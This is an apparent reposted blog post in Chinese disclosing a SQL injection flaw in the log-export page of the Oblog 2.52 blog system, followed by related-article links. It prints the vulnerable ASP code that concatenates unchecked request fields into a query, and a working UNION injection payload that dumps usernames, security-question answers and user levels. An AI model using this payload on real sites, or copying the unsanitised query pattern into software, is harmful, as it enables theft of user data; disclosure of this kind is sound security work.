Oblog 2.52导出日志最新漏洞
2006-05-11 14:31
337 查看
[align=center][/align] |
/** 作者:慈勤强 Http://blog.csdn.net/cqq 2005-02-22 */ 昨天正好从oblog官方网站下载了一套最新的blog系统,版本是2.52的吧。 本来是在qq上看到一个朋友讨论help.asp文件的入侵思路的, 那篇文章在这里可以找到, http://blog.csdn.net/cqq/archive/2005/02/22/297316.aspx 之后,顺手注册了一个用户,大体浏览了一下, 在后台有个导出日志的功能比较好, 这样就可以防止由于blog站点关闭,而自己辛辛苦苦写的文章没法保存的问题了。 csdn的blog就没有导出日志的功能,为此我还特意写了个小程序, 请看这里: http://blog.csdn.net/cqq/archive/2005/02/04/280545.aspx 不过,这个导出日志的asp文件存在sql injection漏洞, 本来是导出自己的文章的, 这样一来,数据库里的任何数据都可以随便导出了, 直接危害到整个blog系统的安全。 主要的SQL代码如下: sdate=request("selecty")&"-"&request("selectm")&"-"&request("selectd") edate=request("selectey")&"-"&request("selectem")&"-"&request("selected") sql="select topic,addtime,logtext from blog where username='"&username&"' and addtime<=#"&edate&"# and addtime>=#"&sdate&"#" 大家看到,所有的客户端数据都没有经过检查就直接使用了, 自然会有问题, 因为不管什么情况,客户端的数据都是不可轻易相信的。 那么,我们构造这样的输入 "selectd=22# and 1=2 union select username,answer,userlevel from [user] union select topic,addtime,logtext from blog where addtime<=#1900-1-1" 整个的sql语句就变为了: select topic,addtime,logtext from blog where username='慈勤强' and addtime<=#2007-2-22# and addtime>=#2000-2-22# and 1=2 union select username,answer,userlevel from [user] union select topic,addtime,logtext from blog where addtime<=#1900-1-1# 这样,就可以输出所有的用户名、用户密码提示问题答案和用户等级了 当然也可以得到数据库中的任何内容了,只要适当的变换sql语句。 |
相关文章推荐
- 关于Oblog 2.52 help.asp漏洞的修补问题
- Oblog最新注入漏洞分析
- 平滑升级Nginx到新版本v1.12.1修复Nginx最新漏洞CVE-2017-7529
- Alert Raised for MS Word Zero-Day Attack(最新漏洞情况报告)
- 炎炎夏日最新版Excel导入导出工具类火热出炉
- cronolog切割tomcat日志以及日志导出方法
- Wooyun最新确认漏洞爬虫V0.02
- 最新易想团购系统通杀SQL注入漏洞分析附利用exp
- 最新变种利用OFFICE漏洞绕过多家杀软
- 【漏洞预警】Cobalt Strike team服务被爆RCE漏洞,尽快升级最新版
- BIND最新漏洞和升级解决办法
- tail 查看日志,并同步日志最新变化 -F参数
- 使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)
- Linux筛选日志并导出csv格式
- 用Python导出QQ空间的日志到WordPress
- 中间人攻击,也谈Firefox/Google Toolbar最新的安全漏洞
- 中间人攻击,也谈Firefox/Google Toolbar最新的安全漏洞
- DedeCMS漏洞之mysql_error_trace.inc日志信息
- SQLServer 工具箱v1.2(SQL脚本排序,日志清除,数据导入导出)附源代码
- 微软系列软件中最新的安全漏洞大揭秘